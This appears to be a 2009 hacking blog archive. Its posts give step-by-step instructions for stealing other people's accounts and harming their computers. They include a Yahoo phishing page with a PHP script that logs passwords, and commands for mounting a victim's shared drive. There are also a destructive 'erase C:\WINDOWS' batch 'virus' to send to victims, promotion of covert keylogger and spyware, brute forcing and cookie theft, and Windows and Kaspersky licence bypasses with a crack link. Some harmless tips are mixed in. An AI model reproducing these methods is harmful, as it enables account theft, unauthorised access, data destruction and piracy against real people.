Tuesday, March 31, 2009

Hack yahoo using fake login page

Fake login page

In this post I’ll show you to hack yahoo using fake login page to hack yahoo in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.



Here is a step-by-step procedure to create a fake login page and hack yahoo.

Hack yahoo using fake login page - Procedure



STEP 1.
Go to the Yahoo login page by typing the following URL.

mail.yahoo.com


STEP 2.

Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.

STEP 3.
Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

STEP 4.
Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML

STEP 5.
Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif

Rename the above link into

src=”files/ma_mail_1.gif

Repeat the same procedure for every file contained in the folder by name “files“.

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.

STEP 6.
Now search for the following term

action=

you will see something like this

action=https://login.yahoo.com/config/login?

Edit this to

action=http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

STEP 7.
Now you have to upload your yahoo.HTML, files folder and login.php to

yoursite.com Root folder

NOTE: Make sure that your host supports PHP


Tip: 110mb.com supports PHP

STEP 8.
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.

STEP 9.

Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
here is the login script which i am posting due to large number of requst


header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;



Monday, March 30, 2009

Hacking into another persons computer

The following article explains the method used for hacking into another persons computer remotely using command prompt in your network ie network computer hacking,I have also posted another article regarding computer hacking termed as How to hack a computer by netbios Hacking,which has a greater sucess rate than this method and written with relavent screen shots


Hacking into another persons computer - Method



Step 1
First of all,get a good IP scanner angry ip scanner is a good one you can get it here:
Angry ip scanner Download

Step 2
Now click on start and then goto run and then type there "CMD" and press ok

 This is what you see:
c:\windows>

Now this is what you have to do ---->>>

Replace 255.255.255.255 with the victims IP address., i have wrote another article on How to trace

an ip address of the victims computer

c:\windows>nbtstat -a 255.255.255.255

If you see this your in NetBIOS Remote Machine Name Table

Name Type Status ---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find  another victim.

Step 3:

Type down:

c:\windows>net view \\255.255.255.255

If the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere


Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

you can replace x: by any letter you want but not the letter of your own drive.

CDISK is the name of the shared harddrive. 


Now type:
c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful you are a small time hacker.

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.


Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to "hack" is not on your network.

Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.



You may also like:
*Hack msn messenger password

Technorati Tags: , , , ,


.......

Friday, March 27, 2009

Hack Gmail account using keylogger

The easiest way to hack gmail is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers

1. Sniper Spy (Remote Install Supported)


Editors Rating: 8/10



SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child
, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes
4. Records any Password (Email, Login, Instant Messenger etc.)
5. Remote Monitor Entire IM conversations
 so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall



For more information on this program and download details visit the following link
SniperSpy

5 ways to Hack Email account passwords

Hack an email account


"How to hack email accounts passwords?" So many people have asked that question,and honestly its a dumb one,.There are many ways to hack an email account passwords but i am covering here 5 of them:
1.Phishing
2.Keylogging
3.Brute forcing
4.Social engineering
5.Guessing the secret question

5 ways to Hack email accounts

Phishing:
This is the most easiest way to hack an email account password Phishing is a way of saying keylogger but in an other meaning.Let’s say you want to create a hotmail phishing page.The page should look
exactly like the real one.
How does it work:

You can download/make a replica of the website you want to phish.And save is as HTML.When you’re done with that,you have to find a way
to upload the HTML.Best way is a Website.Like Piczo/Blogspot.When thats done the user types his/hers username and password.And automatically
it will be sent to you by mail.And there you have it,that’s Phishing.

For more information on see  post  How to create fake login page for any site

Brute Forcing
Brute Forcing is like guessing the password but instead you make/download a password list[a long txt file containing words that might be
the password] ad the Brute Forcer tries them all
Download your Msn Brute Forcer Here:
 [may find a trojan inside but that's normal]




Keyloggers
With keylogger you can easily hack an email account.Keyloggers is like phishing but is more simple.Its a simple .exe executable.When someone clicks it,the Keylogger auto downloads.And you’ll
have ,on your computer,you start it,and put in the ip of the destination,and every hour you’ll receive keys pressed on his computer thats an easy way to find out msn passwords  i have made a post on ,which explains best keylogger  in the trade

Social engineering:
In  Hacking and security , social engineering is a broad term used to describe a non-technical aspect of information technology crime that relies heavily,on human interaction and often involves tricking other people to break normal security procedures




Guessing The Secret Question

If you know your friends,this will be an easy task.Go to http://www.hotmail.com and click forgot password,then put in the email address
and then the CATCHA code,reply on the secret question,but beware because you have like 3 tries only.

Warning:This post "How to Hack email accounts" is is truly for educational purposes

.......

Make windows genuine in a minute

Make windows genuine
Make your Windows XP with Service Pack 2 geniune. Im not sure if this works on SP3.

This procedure described below will allow you to bypass the Microsoft Genuine Validation.
I hope this is the best way to make your copy of windows xp geniune.

Step 1:
 Click Start and then goto run and type ‘regedit

Step 2:
Registry window will be opened, Then Go to
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer

and double click on it. Then change some of the value data to any thing.

Step 3:

Go to start > run > “%systemroot%\system32\oobe\msoobe.exe /a” (again, dont type the quotes)

Step 4:

The activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.

Now you can download all the updates without activating, and the Genuine Microsoft Validation will irritate you No more.

Note: This works better after reformating

Or else do you want to download the crack for XP,XP home,XP 2 and Vista, I am placing it in a zip folder pls download it from the below link

http://rapidshare.com/files/71090926/Crack_For_XP.rar


Thursday, March 26, 2009

How can your location be traced Via your IP

Ip gives it all
Most people wonder how do websites come to know of your location from IP.Now you too can find out.Forget users you can even sneak up on websites. Just enter IP/URL/mailid and vola all the details of are given.

This has some great tools that will help you. You can enter IP/URL/Domain name and much more.

Above is a pic of what it can do (It gives your location. who is your internet provider, how you are connected to him.
This software costs about 60$. What if you dont want to buy the software you can use the lite version. This give only how the data is sent., how are you connected yo him

What if you dont want to download any thing. then there are some online tools

Samspade.org


net4domain.com


visualware.com and more.

5 ways on How to block spams on gmail

What is SPAM?

Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.

While Gmail doesn't filter all spam messages that could reach your inbox, it still does a better job as compared to other webmails such as Yahoo Mail or Hotmail. Apart from consistent improvements being done on Gmail's filters, the utmost ingredient that contribute to the overall effectiveness is the use of community signals.



How to block spams on gmail:

1. Block image spam
As the webmail filters get better, spam also evolves and becomes harder to block. This is particularly true when it uses images and literary texts. Here's a simple Gmail trick to divert spam messages (contain images) to the Trash folder (or any folder you specify) automatically.
Step 1: Firstly you need to go to 'Settings > Filters' and choose "Create a Filter".
Step 2: Type 'multipart/related .gif' in the 'Has the Words' field and also check the 'Has Attachment' box.

Step 3: Click next and select "Delete It" to move the spam message directly to the GMailTrash folder.
Note: There's a small chance of GMail filter triggering false positive and move few important emails from real senders to the Trash folder. To make sure this thing doesn't happen, create a new folder (label) in gmail and change the instruction to redirect all related mails to the new folder. You can sort out the mails later on during your free time.
2. The Plus Hack
If you like to sign up for internet freebies or buy things online, this tip will definitely come handy. Creating alias emails for aforementioned activities which are very likely to spam you, is an effective way to completely reduce number of spams in your Gmail mailbox. Not only you can track who is the culprit and you can also accurately learn with whom your email is shared with.
To do this, simply put a '+' after your account name and add words.
Example: I can do 'eches+online_deal@gmail' or 'eches+spammer@gmail.com'. All these mails will come into your mailbox anyway, but they can easily be filtered to a folder and even to trash them.
3. The Googlemail Hack
When you registered with Gmail account, you are actually given two email addresses
yourusername @gmail.com
yourusername @googlemail.com
You can use both without having fear the later might not reach your mailbox. Like the above trick, you can take advantage of these two domains so that less spam reaches your Gmail Inbox via filtering system.
For example you distribute 'yourusername @googlemail.com' address to your close contacts while keeping the 'yourusername @gmail.com' address for public. Set filter such that all 'yourusername @googlemail.com' to be delivered to a special folder. This is a definitive way to ensure important messages not to be diverted to Trash folder by mistake.
4. The Dot Hack
Gmail doesn’t acknowledge dots (.) in your account name. So I can use 'eches.net@gmail.com' or without any dots at all. Either way will return to 'echesnet@gmail.com'.
Again you can use the power of filter system to divert certain aliases to specific folders or directly to Trash folder.
I hope you can you use some of the tips above to reduce spams in your Gmail mailbox. Again, these tips are not definitive ways to completely eliminate spams but they can effectively reduce the spam numbers.


Gmail may be the best mail arround but it lacks some common features like blocking a spammer from sending you mails. But thankfully here is away to do this.You can send mails from a id to the Trash automatically.

5.Block spammers on gmail:
Select "create a new filter" next to search box
Type the desired email address under From:
Click Next .
Check Delete it box under Choose action.
Save it.

If you wish to blocks a entire domain type just "@example.com". (without quotation marks)
To block more than one address, separate them with "" (without quotation marks).
For eaxample you can block both spammer1@example.com and spam2@example.com by typing spammer1@example.com

Make virus in just one minute

Plx Reply and show your feed back
Here is a simple and easy trick to make a virus in less than 1 minute. :)

CAUTION: DO NOT RUN THE PROGRAM ON YOUR COMPUTER OR YOU WILL LOSE YOUR WINDOWS.

HERE'S THE To Make the virus:

1.Go to notepad,
2. Type erase C:\WINDOWS,
3. Save IT AS SOMETHING.cmd ,
4. Send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...

How does this works?
The working of this virus is very simple,Once the victim runs the .cmd file on his computer,This virus will just erase the windows file causing the computer to crash.

Take care it is a simple but powerful virus.

Tuesday, March 24, 2009

Windows shortcuts

Here are some windoes shortcut keys
Windows Shortcuts keys
Alt + E — Opens the Edit menu
Alt + Enter — Opens the Properties window
Alt + F — Opens the File menu
Alt + F4 — Closes the current program
Alt + Print — Screen Takes a screen shot of the current window or program
Alt + Tab — Switches between the programs currently in use
CTRL+TAB — SWITCHES BETWEEN TAB IN DIALOG BOX,I.E 7
Ctrl + A — Selects all text
Ctrl + C — Copies the selected object
Ctrl + End — Jumps to the end of the current document
Ctrl + Esc — Opens the Start menu
Ctrl + F4 — Closes the current program
Ctrl + Home — Jumps to the beginning of the current document
Ctrl + Insert — Copies the selected object

Ctrl + left arrow — Moves to the left one word
Ctrl + right arrow — Moves to the right one word
Ctrl + V — Pastes the selected object
Ctrl + X — Cuts the selected object
Ctrl + the “+”key — Perfectly resizes the width of Explorer columns
End — Jumps to the end of the current line
F1 — Opens the Help menu
F2 — Renames the selected icon
F3 — Launches the Search Companion in a folder or on the
desktop

F4 — Accesses the Address Bar in a folder or window
F5 — Refreshes the contents of a folder or window
Home — Jumps to the beginning of the current line
Shift + Delete — Permanently deletes files (bypasses the Recycle Bin)
Shift + End — Highlights text from the current position to the end of
the line
Shift + F10 — Substitutes for a right-click
Shift + Home — Highlights text from the current position to the
beginning of the line
Shift + Insert — Pastes the selected object
Shift while inserting — Prevents the CD player from playing an audio CD

Shortcuts for Keyboards with a “Windows”Key (Resembling a Flag)

Windows Key + E — Opens Windows Explorer
Windows Key + F — Launches the Windows Search Companion
Windows Key + F1 — Opens the Help and Support Center
Windows Key + L — Locks down Windows
Windows Key + M — Minimizes all windows and shows the desktop
Windows Key + M + Shift — Undoes the minimize
Windows Key + Opens — the System Properties window
Pause/Break key
Windows Key + R — Opens the Run window
Windows Key + U — Launches the Utility Manager
WINDOWS KEY+U — MINIMIZES ALL WINDOWS AND GOES TO DESKTOP

How to start windows xp faster

One of the best ways to help you start windows faster quickly is to reduce the number of programs scuh as msn,yahoo etc that are loaded while Windows is “waking up.”To tweak the startup, you must use a utility called msconfig, as follows:




Start windows faster - Method:



Step 1:
Click the Start button in the lower-left corner of Windows.


Step 2:
Click Run.


Step 3:
 A window opens.Type msconfig in the blank, and then click the OK
button or press the Enter key.

Step 4:
The System Configuration Utility window opens. Click the Startup
tab on the far right
.
Step 5:

In the Startup Item column on the left is a list of programs with
checkmarks next to them.A checkmark indicates
that the program is scheduled to launch each time Windows starts.To
prevent a program from loading at startup, remove the checkmark
from its box. Here are guidelines about which programs to allow or to
disable:
• Disable non-essential multimedia programs like qttask (which is
part of the QuickTime software), realsched (which is part of the
RealPlayer software), or Adobe Reader.
• Allow common processes for Windows and Microsoft Office.
• Allow programs related to your antivirus software, antispyware
software, or firewall. For example, if you use the ZoneAlarm fire-
wall and Spy Sweeper antispyware program, then you should
allow the startup programs named zlclient and SpySweeper.
• Allow programs related to your printer. For example, if you have
an Epson printer, then allow the startup program named Epson
Status Monitor.


Step 6:
 If you are uncertain about whether or not to disable a particular program, do the following:
a. Write the program’s name on a piece of paper.
b. Connect to the Internet.
c. In your Web browser, type http://www.processlibrary.com to
visit the Process Library.
d. Near the top of this website’s main page is a Search for a Process
search box.Type the name of your program into this box, and
then click the Search Now button.
You are taken to a Web page that explains what your program is
used for and whether or not it is essential to your computer’s
performance.


Step 7:
7. When you have finished tweaking the System Configuration Utility,
click the Apply button.


Step 8:
8.Click the OK button.


Step 9:
9. A message alerts you that you must restart your computer for the
changes to take effect. Click the Restart button.Your computer auto-
matically shuts down and reboots.


Step 10:
 When you return to Windows, a message alerts you that you have just
used the System Configuration Utility to change the way Windows
starts. Put a checkmark in the box labeled “Don’t show this message
or launch the system configuration utility when Windows starts
.”


Step 11:
Click the OK button.
By following these steps you wil realize that your windows no starts faster


.......

Saturday, March 21, 2009

Internet explorer 8 released


Internet Explorer 8 Released, Download Now



Internet Explorer 8, which Microsoft has put into beta testing since more than a year now, has finally released a few minutes ago!
Microsoft has made sure everything goes on well, and has come out with the fastest Internet Explorer ever. Lots of performance improvements and security updates have been made. I’d recommend everyone to give it a try once!

Features Overview:

Faster Internet Explorer 8 is more responsive with new pages and tabs, opening up fast and reliably. You can now get to the information you care about most, in fewer steps; one click access to your webmail, favorite news sites or other online services.
Easier Reduce the steps to accomplish many common tasks, and automate your access to real time information updates. You can keep track of your favorite sports team, news, weather with a single click.
More Private Helps protect your privacy and confidential information where ever you go on the web.
More Secure Helps protect and stop malicious software from reaching your PC, and makes it easier to detect when a website is an imposter.
Or you can check out the IE8 features review done by us.

After using the beta and RC releases, I’m impressed how Microsoft has worked hard to put IE back into the browser-war! IE8 is available for Windows XP, Vista and Server 2003 and 2008. I don’t see any IE8 links for Windows 7. Looks like, Microsoft has something else in mind for the Windows 7 users.

Download Internet Explorer 8

You can download Internet Explorer from the download page link given below.
Download now


.......

Friday, March 20, 2009

Products

Recommended products by Rafayhackingarticles:
                                          
                                        CATEGORIES                                                            

1.Remote pc spying softwares


2.Hacking and security books


3.IP Hiding Softwares


4.Antispywares

 

How to open two orkut account in one tab

Today i will show you a trick to open two orkut accounts in one tab ,This trick needs Mozilla Firefox 3 and this was requested by lots of readers,so on readers demand i am posting this trick,kindly show your feed back by commenting


Open two orkut account in one tab - Trick

Step 1:
First open Firfox and then login to Orkut.

Step 2:
After logging in Open a new Tab in Firefox and click on close button of the browser

Step 3
You will get a Dialogue box Click on SAVE

Step 4:
Then again open Firefox, you can see you are still logged in
Then On your Orkut home page, scroll down and at the bottom you will see go to orkut.com



Now you can see a new login screen has come
Login with your second account and Enjoy :)

.......

Thursday, March 19, 2009

Brute force attack

Brute Force Attack is the most widely known password cracking method. This attack simply tries to use every possible character combination as a password. To recover a one-character password it is enough to try 26 combinations (‘a’ to ‘z’). It is guaranteed that you will find the password


.. but when? How long will it take? The two-character password will require 26*26=676 combinations. The number of possible combinations (and therefore required time) grows rapidly as the length of the password increases and this method quickly becomes useless. Do you ready to wait for two months while your 9-character password is cracked? What about one hundred years for an 11-character password? Besides the maximal length of the character set you should also specify the character set i.e. the list of characters that will be included in the combinations. The longer the character set is, the longer the required period of time is. Here is the problem: usually you have no idea of what characters are present in the password. On the one hand, you should specify all possible characters. On the other hand, this can slow things down very much. Unfortunately, there are no common ways to determine what character set to use. It is more a question of luck and intuition. The only thing I can recommend is to begin with trying short passwords using the full character set. Then you can increase the length of password simultaneously decreasing the character set to keep the required time good acceptable.

If the password is case sensitive (this is the most common situation), there is another problem with the case.



There are three options:



1) you can assume that the password was typed in lower case (this is most likely). In this case, the required time will stay the same but if the password contains upper case letters it will not be recovered.

2) you can try all combinations.



The password is guaranteed to be found, but the process slows down significantly. A 7-character lower case password requires about 4 hours to be recovered but if you would like to try all combinations of upper case and lower case letters, it will require 23 days. 3) The third method is trade-off. Only the most probable combinations are taken into consideration, for example "password", "PASSWORD" and "Password". The complicated combinations like "pAssWOrD" are not. In this particular case the process slows down to one third of original speed but there is still a possibility to fail.


You can reduce the amount of time required using faster computers (only the CPU speed is important. The amount of RAM, the performance of the hard drive and other hardware don’t affect the brute force speed), using several computers, choosing the fastest password crackers or tuning the brute force parameters wisely and accurately.

How to open multiple yahoo


Here is the trick to open multiple yahoo...
Yahoo Messenger trick-How to open Multiple Yahoo Messenger???
1. Go to start > Run > Type regedit > Press Enter
2. Click on the plus sign near the folder HKEY_CURRENT_USER
3. Click on the plus sign near the folder Software
4. Click on the plus sign near the folder Yahoo
5. Click on the plus sign near the folder Pager
6. Right Click on the folder name Test > New > DWORD Value
7. Right side you will get a file named New Value #1
8. Right Click on the file New Value #1 and Rename it as Plural and press enter
9. Double Click on the file Plural
10. You will get a windown named Edit DWORD Value
11. Type 1 inside 'Select the Value data' and press enter
12. Close the registery editor window
13. Now you can launch multiple windows and use different ID's.

How to delete undetecteble file in windows xp


TOday ill tell u how to delete undetecteble file on XP. They are not deleted simply and a message appears that "access denied" There is a simple way to delete those files. Read this carefully.

Click on Start, Search, All Files and Folders.

Right-click on file and choose properties

file location example: c:\windows\system32\undeleteablefile.exe


Open a Command Prompt window

Again Click on Start button, Run and type TASKMGR.EXE and press Enter to start Task manager
Click on the Processes tab, click on the process named Explorer.exe and click on End Process.

Minimize Task Manager.

Go back to the Command Prompt window and change to the directory where the file is located. To do this, use the CD command.

cd \windows\system32

Type DEL where is the file you wish to delete.

Example: del undeletablefile.exe

Go back to Task Manager

In Task Manager, click File, New Task and enter EXPLORER.EXE to restart the Windows shell.

Close Task Manager and the file is deleted.

What is a keylogger - Keylogger explained

Today, with the advent of a program called Keylogger it’s just a cakewalk to hack an account. It doesn’t matter whether or not you have physical access to the victim’s computer. Using a keylogger is the easiest way to hack an account. Any one with a basic knowledge of computer can use the keylogger and within few hours you can hack any account.

What is a keylogger?
A keylogger, sometimes called a keystroke logger, keylogger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an account if you have physical access to victim’s computer.



A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password

Hack an account using keylogger:


NOTE:-YOU NEED TO HAVE ACCESS TO THE VICTIM'S COMPUTER TO DO THIS:


If you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.

 Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. 




Which are the best keylogger now a days?
I have made a detailed post on this topic in my post Which spyware keylogger software to choose,You must prefer reading it

RAT:(Remote administration tool)
Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.


.......

What to do if your Google account gets hacked


What to do if your Google/gmail account is hacked?

It will be a nightmare for you if your google account gets hacked,Most of the people in these cases waste their money contacting the password recovery services wasting their money,I dont say they dont get back password,But you can do it by putting in some efforts

I will begin with Google. it's a pity thing your account got hacked. in most cases it was you own fault that it got hacked. in rare cases i it the hacked who really did something . you should take care. Read more on how to prevent your self from getting hacked.


Now coming back to the main discussion . you can do the following to once hacked.


Change password:- The first thing you need to do in case your account is hackedis change your password and all security details. in most cases the hacker doesn't has your password but cookies.So once you change it the problem is solved. In case you are not even able to log in use the following link to reset your password

Contact Google:- Once you have performed step one. immediately contact Google.You can use one of the forms based on your account type.You will be asked the exact creation date of your Google Account and also a copy of that original ?Google Email Verification? message. if you are lucky then only google will help you . In any case you will receive a reply from form them.


With Gmail id:- If you use a gmail id to login then use this form to contact google.
Without Gmail id:- If your Google Accounts is not linked to Gmail i.e you dont use gmail id to login then use this form.

Inform all your buddies:- Send a mail to all your buddies informing them that your account has been hacked.Who know what the hacker might have done.

Use Kaspersky without a key




Kaspersky is one of the world,s best antiviruses,but unfortunately its full version is not availible,there are many keys availible online but believe me these are only to waste your time,Your all efforts will end in smoke.
I am posting here a method to use kaspersky antivirus without a key (Temp. sol. if ur key is not Valid)



Just follow the steps:

you need to back up first in case any thing goes wrong

1.( Run ) type ( regedit ) press ( OK ).

1- Go To ( HKEY_LOCAL_MACHINESOFTWAREKasperskyLabAVP6Data ) & right click on ( Data ) & choose ( Permissions ).

2- choose ( Advanced ) From The ( Permissions For Data ) ... a new window will open.

3- On ( Advanced Security Settings for Data ) window .. look for ( Inherit from parent ... ) click on the nike or check mark to remove or uncheck it.

4- After removing the check or nike mark u will get a new message .. choose ( Remove ).

5- On ( Advanced security Settings for Data ) click on ( Apply ).

6- choose ( Yes ) for the new message that u will get.

7- Press ( OK ) on ( Advanced security Settings for Data ).

8- Press ( OK ) on ( Permissions For Data ).

9- Exit KasperSky & restart it again.
The Kaspersky icon will be GRAY but it is working perfect.
- You will have to update the database manually ... no automatic update.
- Ignore
Windows security center that the antivirus is not working ... in fact it is active.
-



.......

Download video from youtube with out software


Here is the easiest way to download any video from Youtube.

While playing the video on youtube.com, Copy its location from the address bar like www.youtube.com/watch?v=sasad7657dms2

then add the word ‘kick’ between www. and youtube.com/link…….

EXAMPLE: www.kickyoutube.com/watch?v=sasad7657dms2

That’s it, Download without any other software or going to any other site, as their are many but this method is the best one according to me. Enjoy :)

.......

Brute force Password Cracking explained

Brute force is the best hacking method to an email account  as chances of getting password is very high.The methods is very simple . But this method is cumbersome. Still most hacking software use this method due to high success rate .

This is how you do it. All that you need is the username and findout what is the max password length the software/site allows and also the minimum. say the minimum is 6 and max is 8. You have to start trying out all the combination.First all the six letter combos then seven then 8

aaaaaa

aaaaab

aaaaac

aaaaab

.

.

abaaaa

.

.

azzzzz

baaaaa

.

..

zzzzzz


Now once you do for 6 repeat the same for 7 and then for 8 . You will surely crack it.But the no of combos you need to try is very high.So in most cases you cannot use it but designed software do the job in few minutes. Check crack passwords section for such software's to crack your software/site. This is best used to recover passwords of mobile phone . If use them for hacking,you guys just remember to use strong passwords both upper,lower case and number too to make a strong password usually not below that 9 letter and minizme the chances of getting your account hacked

Here are the two most popular and well known Brute forcers
1.Brutus aet2                 2.Munga Brute force

6 Ways How Hackers Can Your Hotmail Passwords




Are you curious for "Hacking hotmail password" well then this post is just for you, Most people ask me to tell us the easiest way for hacking hotmail password,so here are some ways how hackers can hack your hotmail passwords so you can protect your self from these kinds of attacks

1. Url way:

This is the most easiest way For hack  hotmail password.All that you need in this method is the victims username. The method is simple. all that you need to do is type " www.hotmail.com/cgi-bin/start/username ".

2.Html way

This too is very simple method to hack hotmail account password . just go to http://www.hotmail/proxy.html. Now type the username. Press login. You will get a error message. Now you need to look at the source code of the page( view>>page source). In the code you are going to find "action=someadress". Now simply copy theirs address and you are in. This it. same conditions as above apply here i.e user must not log out.



3.Hotmail phishing:

You can create fake page for hacking hotmail passwords that look same like the hotmail site. You will find the exact details at this page on creating fake pages.Just remember one thing to change method = post and your e-mail id in the action field . If you dont know html please learn it and then use it.I have added a post on How to create fake login page for any site

4. Social engineering :


This is the method very useful to hack hotmail account password if victim is someone whom you know well and is your good friend. For this method to work, you should have good logic and communication. In social engineering, hacker tries to retrieve information from victim which can help him hack hotmail account password. Say, if you know what is answer of security question, then you can easily hack hotmail account password by using Forgot Password link. So, to know his security answer, you have to use your logic. This must be done carefully as victim must not know your intensions.

5.Brute force

Brute Force Attack is the most widely known password cracking method. This attack simply tries to use every possible character combination as a password. To recover a one-character password it is enough to try 26 combinations (‘a’ to ‘z’). It is guaranteed that you will find the password
Here are the two most popular and well known Brute forcers
1.Brutus aet2
2.Munga Brute force
To learn more about Brute force see my article Hack hotmail accounts using brute force



6.Keylogging:

This is one of the easiest method to hack hotmail account password,A keylogger, sometimes called a keystroke logger, keylogger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an account if you have physical access to victim’s computer. 
See my post Hack hotmail password using keylogger


Update:-

Hotmail seams to have tweaked their system . it no longer allows 2 users using the same account at same time. So the best way is to use it from the victims comp.....

Warning:This post How to hack hotmail password is for educational purposes

.......

6 ways on How to hack orkut account

Most of people are curious to know on How to hack orkut account,due to rise in number of hackers,orkut security has became a challenging question for the security experts,my purpose of this post is not to teach you hacking but to make you aware of the hackers,Below are some of the methods written through which a hacker can hack an orkut account






                                
How to hack orkut account-methods


1.Orkut Phishing:
As i have stated in all articles, Phishing is first priority to hack Orkut passwords. Infact, it is most favorite method of orkut hackers. Here, you have to send a fake orkut login page (orkut phisher) to orkut friend and ask him to login to orkut account by this fake orkut login phisher. This orkut phisher is, ofcourse, prepared by you. When orkut friend logs in to orkut account by this orkut phisher, his orkut password is emailed to you and thus you can now hack his orkut account. I have added a post on Hack orkut using fake login page


2.Keylogging :
This is most easy way to hack orkut password. Here, you have to install keylogger software on victim computer and give destination at which keylogger will send all passwords typed on friend's computer. And then keylogger will start recording all keystrokes on victim computer and send these passwords. This keylogging becomes more easy if you have physical access to victim computer. Even, remote keylogger installation can be done. i have a made a post on Which spyware keylogger softwares to choose the following post will tell you about the best best keyloggers availible now days.


3.Community links :
Many times, you are provided with community links in orkut scraps inviting you to join it. On clicking the link in orkut scrap, you are directed to orkut phisher explained above, ready to hack orkut account profile .I have made a post to Hacking orkut through community links,


4. Orkut Javascript hack :
This method became much famous in last year. Here, orkut victim is provided with some javascript (popularly called code) and is asked to copy paste this javascript code in his address bar for say changing his orkut theme. When victim does this, his orkut cookies are stolen and now orkut hacker has hacked his orkut profile using cookies. I have written more on orkut cookie stealing in Hack Orkut account account by Cookie stealing.


5. Link manipulating:
  • Link Manipulation : Link manipulation is one kind of hacking trick wherehackers fool people with identical domain names. By an email or scrap or message, they send you a link. Once you enter your ID and password in those pages, be sure that your profile is gone for ever. That link will be 90% identical with Orkut. Here are few of them.
  • www.okrut.com
    www.orukt.com
